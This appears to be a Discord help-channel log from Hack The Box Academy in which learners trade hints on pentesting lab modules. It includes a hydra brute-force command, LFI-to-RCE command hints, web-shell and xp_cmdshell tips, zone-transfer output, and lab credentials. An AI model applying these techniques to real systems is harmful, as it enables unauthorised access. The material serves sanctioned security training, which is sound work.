Who has completed the AD Skill Assessment Part 1?

I don't need a nudge but would like to see if you did a certain area differently then I did, so I can add more stuff to my notes.

hey there, i need a nudge or hint towards 'What is the FQDN of the host where the last octet ends with "x.x.x.203"?' in the DNS section of footprinting

ive used an AXFR zone transger to identify hosts, but unsure where to go from here

sub-domain

sub domain on the hosts?

i figured it out! the box did not give me creds!

i have to do it all over again

ive found dc1, dc2, mail1 etc. so do i do a bruteforce on these?

axfr on the fqdns you found

yup i did that

so i did axfr on the internal

Those sound like host names of machines, doing bruteforce on those won't be helpful, look for something that doesn't sound like a machine name

and i get a bunch of hosts back

hahaha i completely did the AD Assessment Part 1 the HARD way

so try the for loop using the ws1?

Hi, im stuck in the Hard Lab from Footprinting. I need a hint. I founded a user and passwd, but i cant connect with ssh

Are you looking for a hint or an answer 😅 . I probably have already given too much away already. Dnsenum with the correct wordlist and sub-domain should do the trick,.

true ok ill keep trying

im just seeing if i was on the right track

no results from the DNSenums

Read over the course material and make sure you are querying it correctly 🤷‍♂️

for the dnsserver parameter in the dnsenum command, i keep the IP address of inlanefreight.htb right?

or do i change it to the internal DNS

You should be querying sub-domains of inlanefreight.htb

Maybe you should be trying to connect to something else. You should be able to check what authentication methods the ssh server allows.

Got the same issue tho

So it looks like the boxes in the "service scanning" module just went down? Looks like they vanished in the middle of a module I was working on.

i am doing that :(

someone to help with AD Enumeration and Attacks Skills Assessment II? ||lazagne isn't dumping the cleartext creds on SQL01||

What sub-domain are you targeting and what wordlist are you using?

fierce-hostlist on the internal subdomain

dnsenum comes back with no results

Why are you doing a bruteforce on internal when you can axfr? What other sub-domains are there?

dc1, dc2, mail1, ns, vpn, ws1, ws2 and wsus @knotty quest

i mean sub-domains of inlanefreight.htb, go back a few steps and look again

app and dev

Start from there

ty i got the answer

hey, I have a meterpreter shell open on my target machine, but it does not do many linux commands like "sudo" "curl" "wget" am i missing something?

type help

a doh. Thanks.

Hey guys!
Is there a list that shows HTB boxes that are related to the modules?

https://academy.hackthebox.com/academy-relations

thank you!

Hi. I hope you don't mind answering a question about the module: Attacking Common Services Easy

I was able to upload a web shell but can't get a reverse shell. I can only execute whoami and dir commands

I also uploaded a base64 encoded powershell reverse shell but when I go to the file location in the browser, it just displayed the base64 encoded string. No reverse shell

I could help you with that might want to enumerate and brute force the smtp service

anyone on that can give me nudge on the AD enumeration and attacks skill assessment 1? Im one the 4th question

Submit the contents of the flag.txt file on the Administrator desktop on MS01

found the svc_*** credentials. Tried a few pivot techniques using like using netsh , unsuccesfully trying to set up a winrm session in the powershell webshell,

I have already done that. I was also able to use mysql to write files. I just can't get a reverse shell.

I wasnt able to get a full blown reverse shell but a php webshell can get r done

Yes, I was also able to upload a web shell but can only run a few commands such as dir and whoami. I just need a little nudge to how to get a shell or read the flag.

you can kind of navigate using just the dir command + absolute paths once you find the flag use the command <type> + absolute path to read the flag

I tried already using Burp but the output was blank. I'll give it another try. THANKS
I just want to know if there is a proper way to get a shell.

sure there is but I just uploaded a php webshell via the sql server and navigated to the flag and read it.

similar method to the "curling" box in hack the box

I tried to use "dir C:\Users" but didn't get anything back.

I don't have subscription to HTB. I just have access to the Academy.

if you still need more help you can dm me

Hi, I'm doing the Footprinting module, and I have to do the following:
Identify if its possible to perform a zone transfer and submit the TXT record as the answer. (Format: HTB{...))
The thing is when I execute
dig axfr inlanefreight.htb @<target-ip>
I found these three TXT records

;; global options: +cmd
inlanefreight.htb.    604800    IN    SOA    inlanefreight.htb. root.inlanefreight.htb. 2 604800 86400 2419200 604800
inlanefreight.htb.    604800    IN    TXT    "MS=ms97310371"
inlanefreight.htb.    604800    IN    TXT    "atlassian-domain-verification=t1rKCy68JFszSdCKVpw64A1QksWdXuYFUeSXKU"
inlanefreight.htb.    604800    IN    TXT    "v=spf1 include:mailgun.org include:_spf.google.com include:spf.protection.outlook.com include:_sp```
But tried all of them as the answer, and with the format it specifies, but it doesn't work. Any ideas?

What I find strange is that the task is submitting "the" TXT record, so maybe I'm doing something wrong in finding three of them

Yes, but the message its about the public key. I dont know, how yo convert my passwd in key.

DNS section ?

You could try with another internal zone

Yes, section 1069

How can I do that?

Check what zones are available

favorite module so far

Cg

tx

The intranet chapter is really expensive, requiring 2500 modules

Can someone spot the mistake here? I’ve made many modifications to the payload trying to make it works, even I tried just copying and paste it and still got nothing. I’m just reviewing this module, I already completed this practice in the past and I don’t remember having any issue with it

It’s supposed to be like this

Did you figure it out yet?

You can't. Store what you have found and keep enumerating. What other programs are there? Have the credentials been re-used for any other accounts etc? It isn't always going to be as simple as find something and you are in.

hello guys i have a problem with The above web application employs more than one filter to avoid LFI exploitation. Try to bypass these filters to read /flag.txt

I cant get the flag, can somebody help ?

Modul: LOGIN BRUTE FORCING
Page: 11
Problem: unable to crack FTP (task 2)

• Once you are in, you should find that another user exists in server. Try to brute force their login, and get their flag.
  command: ||hydra -l g.potter -P rockyou-30.txt -u -f ftp://127.0.0.1 -t 4||

netstats: https://i.imgur.com/5Ps6clx.png

What i read on forum i should i have mistake somewhere in ip adress, but i dont know where

which section ?

hide the spoiler

https://academy.hackthebox.com/module/23/section/1491

dm me your command, errors and whatnot

what error do you get?

no error just i cant crack it

i think im targeting wrong ip but i dont know which i should target instead

you're talking about the skills assessment right?

yes, part 2, task 2

hey guys

need a little hint on FIle upload module (skill assessment)

dm

and you're using the wordlist provided?

yes

rockyou-30 located and run on the ssh target

okay that's weird then

why?

well I don't see any reason why your command wouldn't work

ip is good?

does it work for you?

?

try ncrack

sometimes it works better than hydra

dm the password for the first user i don't have it in my notes

I'll try and tell you if it works for me

In Attacking Common Services Lab - Hard is it normal that the only service I am able to ||bruteforce is MSSQL||? I'm guessing that's how the lab is designed but I tried the ||password list gathered from the previous lab (since it's the same user),, the mutated password list from the previous module (which worked on a few occasions in this module) and rockyou|| and the ||user with or without @inla...|| and so far not a single result. What I'd like to know is should the other services ||be bruteforce-able as well and should my MSSQL bruteforce ||have given me a result?

does anyone know how to hack into others accounts?

idk hacking i need help with something

@drifting vine familiarise yourself with the #rules

Hey can somebody help me with IMAP/POP3 section of the footprinting module, I could not find the admin mail address I tried to login as robin via openssl but can't FETCH anything there

Am I missing something? I am working through the Pentesting Career Path and the IPs have been incorrect in Service Scanning and Web Enumeration. Am I not supposed to be following the text and finding these myself?

The IP in the skills assessment isn't working?

Correct. So if I am doing this the host is not there. For the last one it said the IP was 10.129.42.253, yet it was .254. I only found it using an nmap scan of the subnet and guessing. I nmap'd the 10.10.10.0/24 and found nothing that would be close to the screenshot though.

You need to replace the IP’s in the terminal screenshots with the IP of the target you spawn below.

This is the academy

I wasn't aware we spawned hosts here

So those are just examples and the IPs in the screenshots and throughout the sections are probably not active

For better explanations of how to go through the modules and complete them check out the introductory ones like "Penetration Testing Process" and "Getting Started"
https://academy.hackthebox.com/module/details/90
https://academy.hackthebox.com/module/details/77

Okay, thanks.

Okay, I see what you are talking about now. Thanks!

Hi, i cant ssh into parrot linux.
SSH to 10.129.121.238 with user "htb-student" and password "HTB_@cademy_stdnt!"
It dosen't work!
ssh -l htb-student -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" 10.129.121.238
Permission denied, please try again.

sure, i can reach the ssh port but i can't authenticate.

it worked after i just typed the passwod and not copied it!!

hello i got stuck with PHP wrappers i cant read: Try to gain RCE using one of the PHP wrappers and read the flag at /

https://academy.hackthebox.com/module/23/section/253

Can somebody help ?

yes for the other services and no for the service that you currently brute forcing

for the last question you can follow this https://donsutherland.org/crib/imap but for that question i end up have to putting the picture together for the admin mail address (the only think you'll really need is the username)

for RCE you can just follow the example show under Remote Code Execution

i can execute the command ID and it gives output but how can i read the flag at / ? cat /flag as a command

cmd=pwd returns working directory

/var/www/html but i dont know how to add a command for example 'ls -al /'

sorry for the delay but i just give it a try and that command work just fine for me

I have used robin:robin credentials and logged in via openssl but there are no message in the inbox am I on right track atleast

cmd=''ls -al /''

can you write the command ?

i'm given that section a check right now but yes

i don't need to re-encode the php cmd payload thing i just need to put the command at the end

also you can't use quotes for linux command

i give it a try

i don't remember exactly the number but there should be ||multiple mailbox|| and one of them is the right one with some stuff in it

yeah you don't need to send me this also for the love of god pls remove spoiler (the flag name)

i got the flag

thank you for the assistance and help, all i needed was a little bit of a push

and you will get another one from mods if you don't remove the flag name

there is a reason the flag isn't named flag.txt

i removed the flag name 😉

Hey guys can someone help me or give me a nug for the tls ssl Assessment. I can decrypt the cookie but I am unable to craft the Admin cookie. Tried few things

Hi, how i can read email in IMAP? i try but i cant. Im stuck in footprinting hard lab.

That can happen depending on the paste keystroke you hit, could be adding additional characters

the windows foothold machine on ad module is laggy asf i cant even open a cmd prompt is there any way to fix that?

#welcome

Active Directory Enumeration & Attacks

Credentialed Enumeration - from Windows

Qus: What is the password for the database user?

i got a pass from the config file but its not working any hints will be helpful.

Hey guys can someone help me or give me a nug for the tls ssl Assessment. I can decrypt the cookie but I am unable to craft the Admin cookie. Tried few things

make sure you are correctly copying it and pasting

worked thanks

For terminal to paste you need to do [ctrl+shift+v]

Remember, IMAP is a file directory structure so first you need to select a specific folder to see the email

So I finished windows fundamentals.

I learned somethings here.

I had a migraine.

Drank 2 cups of coffee.

Got frustrated to the point where I wanted to break something.

But I got it done.

I'm doing the Skills Assessment for "Attacking Web Applications with Ffuf". The 2nd question asks about file extensions, and I'm confused about the answer it accepts. One of the extensions the question expects for the correct answer only responds with 403s. Why would this be considered an extension accepted by the webserver?

Look into what a 403 status is

Doesn't 403 Forbidden imply that the webserver cannot accept the request, while 401 Unauthorized implies that it can accept, but needs authentication? What am I missing?

403 means it exists but as an anonymous/not authorized user you can't access it, so that's why it's accepted

It accepts your request to view the page but tells you, you aren't allowed to see it

I'd be more concerned if it said 404

Ok. That's making more sense

Thanks!

/etc/passwd isn't a privilege file, but there are also just command line things you can do

whoami /priv

Hi, I am stuck on Broken Authentication - Skills Assesment. I have the users with country Extension and their passwords, I decrypted htb-sessid cookie, I have htb_sessid_persistent. But I don´t know how to escalate privileges or discover admin module

What module is this related to?

And the module didn't talk about anything you can try?

Hi gang, need some help.
are currently on the footprinting hard

Able to Log in as Tom to imap service and select his inbox . When I try the content i run in to a wall. have tried "1 FETCH RFC822" and I get BAD error

nvm

figured it out

used wrong fetch command

Someone once told me, "No matter how good you are with a computer, there's never gonna be a day where you dont want to light your computer on fire and push it off a cliff laughing maniacally.

File upload attacks - skills assessment. Can I get a hint about how to read upload.php?

Hey, I just noticed that the time left counter on my target VM is going down WAY to fast

like, I'm losing a minute every 15 seconds or so

That timer has no bearing, you still get the full like 90 minutes

Thanks! Maybe it was some Javascript weirdness

Hi team, I need help for Pivoting, Tunneling, and Port Forwarding -Skills Assessment, What did you recommand to transfer files from windows machine to my attacker one or vice versa

Anyone had issues with module PIVOTING, TUNNELING, AND PORT FORWARDING section RDP and SOCKS Tunneling with SocksOverRDP exercise ? The host 172.16.6.155 doesn't seem alive.

When a module has a length of 2 days or any number of days, is a day defined as 12 hours or 24 hours?

reload the vm if you have connection issues, for me everything worked well

3-4th try reloading it and was even waited like 20-30ish minutes to let everything boot up correctly 😦

MP if you want no prob

I think I know what's your problem

The easiest way is to log in with xfreerdp. Then you can simply mount a share drive.
Otherwise, set up an SMB share on your VM.

thx I found the solutino with the /drive option

One day is calculated with 8h.

Personally, I find these time indications difficult. It all depends on how much you know about the topic. Depending on that, you need longer or shorter.

Thank God

Same tbh, I am a slow reader so I feel pressured by the time indictions "Damn it, i was supposed to finish this 5 hours ago"

But it is generally helpful for planning ahead. Overall, in glad they're there

Don't let yourself be pressured. It's okay if you need more time.

Many people here have always asked about the duration and HTB has responded by defining a time for each module.
I don't think I have kept to this time for a single module. Sometimes I was faster, sometimes I was slower.

Thanks! You too

File transfer modules, when they talk about upload vs download, is that in context of the target machine? Upload files from the target to the attack host and download to the target from the attack host? or upload to the target from the attack host and download from the target to the attack host?

Not entirely

You can also upload to the attack host from the target

Context is mostly within the question

so it can vary from question to question, when looking at LOLBAS it says download and upload, is that generally from the target machine perspective? upload / download, from/to the target?

But for simplicity sake: when referring to download, they are generally meaning move file from attack machine to target. Upload will generally mean from target machine to attack machine

The module itself walks through many different scenarios

Module: osTicket

Find your way into the osTicket instance and submit the password sent from the Customer Support Agent to the customer Charles Smithson .

I'm stuck here. Anybody help me ?

Found it. Thanks @rustic sage

In the module, two usernames are mentioned in the section "osTicket - Sensitive Data Exposure". Log in with one of them and read the existing tickets.

Can someone dm me i need help with something it's personal

If it's in regards to hacking a service for you that's highly illegal, even if details are discussed in DMs. #rules

Hey all, Just did the easy lab for Attacking Common Services, there a hint after getting the flag that says that there are two ways of solving this. If anyone who did this already is willing to discuss it, please DM me! Thank you

Anyone else having issues with the assessment for the information gathering web edition module? I can't get the 3rd question because it appears that the i.imgur site is down.

If it is only about that, then not
#modules message

If it's for help with one of the modules, just post your question here and I'm sure someone can help you out

Never mind. I figured out that I already had the answer for the 3rd question.

Can anyone help, I'm attempting to intercept a web request with owasp zap, the port number is correct but I can not access the page with the proxy on and intercept turned on, I can access it without them turned on and when I try to refresh the page after turning them on the page just loads indefinitely, it is the same whether i do this in pwnbox or my own VM, i've seen quite a few people asking the same thing on the web but have not seen it resolved anywhere. This is the Using Web Proxies module Intercepting Web Requests.

Because the proxy intercepts the web request, you need to click "forward" in the proxy application to step forward in the next part of the chain

That's how the proxies work

If you're intercepting a web request it's terribly inconvenient if you have to time it just right

@fathom pendant i did that and it unset the break and the website is still trying to load

try continuing to hit forward until it loads/you see what you're trying to see; i'm sure the module tells you what to do ¯_(ツ)_/¯

i try to list all environmental variables with env or printenv, but it just shows me the binary /usr/bin/env... any idea whats going on?

Anyone available for sanity check on why war file is failing on tomcat?

is there a test for the linux fundamentals

like at the end of the module

to say you know it

Hi all, I'm struggling with Host3 for 'The Live Engagement' within Shells & Payloads as it has port 445 closed. [However it is suggested I have to use a specific exploit that would target SMB]. Can anyone help me out please and confirm if this is expected?

Usually most modules will have a skills check

yes at the end

so is that it

those knowledge checks

Yes

Yosh

thanks

Ref my above post/comment, please let me know if it's the right place to ask that Q

I had no issues with it give me one moment

On the shells and payloads module, I’ve tried using both the 172.16.1.x and the 10.129.227.x IP addresses, and I cannot get a shell to catch. I know it’s something stupid simple that I’m overlooking, any help appreciated.

Thanks for looking into it. The only port open on Host3 for me (at least about 10 mins ago) was RDP / 3389. So could not get the SMB exploits to work haha!

You’re doing the same module as me. Can you give me a quick nudge?

i'm stuck on (Attacking Common Services - Hard)
got rdp & sql & impersonate & linkserver name
im stuck at enabling commands
"A system administrator can enable the use of
'xp_cmdshell' by using sp_configure."
need some help

solved 💯

sorry for delay had to troubleshoot my vm; bridged adapter was being dumb

gonna rerun that one

ah right; the host-3 hint seems to indicate something else

not smb

but something that may remain eternal

but yeah that should get you your answer

not sure where you were getting hints that SMB was going to be the way in; can you elaborate where you got that hint? cause nothing on the hints on the page seem to indicate anything

How long did it take you guys to finish pentester path?

it's different for everyone tbh some people have a lot more spare time and can complete the path in half the estimated time (~41 days estimated) some people take longer it's a big mixed bag

if you are in the Login Brute Forcing module hint check your parameter

same as MarcieLee i would say a bit over 1 month if you don't procrastinate

huh... somehow my resolv.conf file got yeeted

lol when i did sudo vim on it... it just had the default

lol the server side attacks skill assessment must have been the easiest one of all the modules I've done so far

stupid question

has anyone done the crackmapexec module

no sorry

im new to discord

i found it when i was trying to get free v bux

are you there 😦

https://tenor.com/view/cry-sad-gif-25488313

never mind i figured it out

hi

will you be my friend

😦

😩

hewwo

nobody wants to be my friend

hewo

yep I am dumb i was doing pth wrong :^)

this place is for conversations about the #modules found on https://academy.hackthebox.com ; to gain access to more of the server you need to verify your https://app.hackthebox.com account using the instructions from #bot-commands and typing the ++verify command in there.

@graceful rampart once I got the ball rolling i had no problem with Julio in the PtH section WOO; it all comes down to "I did the thing wrong" (also cmd being dumb)

any recommend on a stable pivot method (also port forwarding) through the old windows 7 ?? not all c2 can do this and the few that can is like super unstable

this discord is for hackthebox platform content if all you want is free v bux and think spamming will help, pls kindly F off

KEK

that was fast

yeah not sure why all these kid keep getting on this channel

because it's the only set of channels that's not role locked behind verification

because some people are just interested in the academy and not main platform

oh no i mean the kid and spammer not the people interested in learning

that's the base reason

the kids and spammers are an unfortunate side effect of these

i mean there a couple of channel that you can access without verify no idea why this is the channel they always go on first

because it's the most active

fair. i didn't even think of that

He got the 👢

Ugh I think I'll call it a night and work on PtT tomorrow LOL spent a few hours just troubleshooting why my system decided to say "no thanks" to having a dns

so I didn't get as much done today as I wanted

Chat cleaned 🙂 ❤️

<3

does anyone know how to loop over the content of a .txt file in bash?

I've been tryin for w in /usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt but that just sets the filepath as w

nvm found a way

For x in $(cat file); do <command> ;done

Where you'd insert $x where appropriate

yeah i did for read p.[...];done < file.txt

Though most things that make use of wordlists have an option to just do the wordlist

Instead of needing to write a loop

Usually indicated by the opposite letter case i.e. -l, -L

@vital adder @fathom pendant Thank you guys. Just completed IMAP/POP3 after the hints you provided

Np the things related to mail server enumeration I'd advise just installing a mail client so you can sign in with creds without having to fight protocols :)

But doing it the long way def helps reinforce things

oh yeah forgot to response to your dm, sorry about that

NP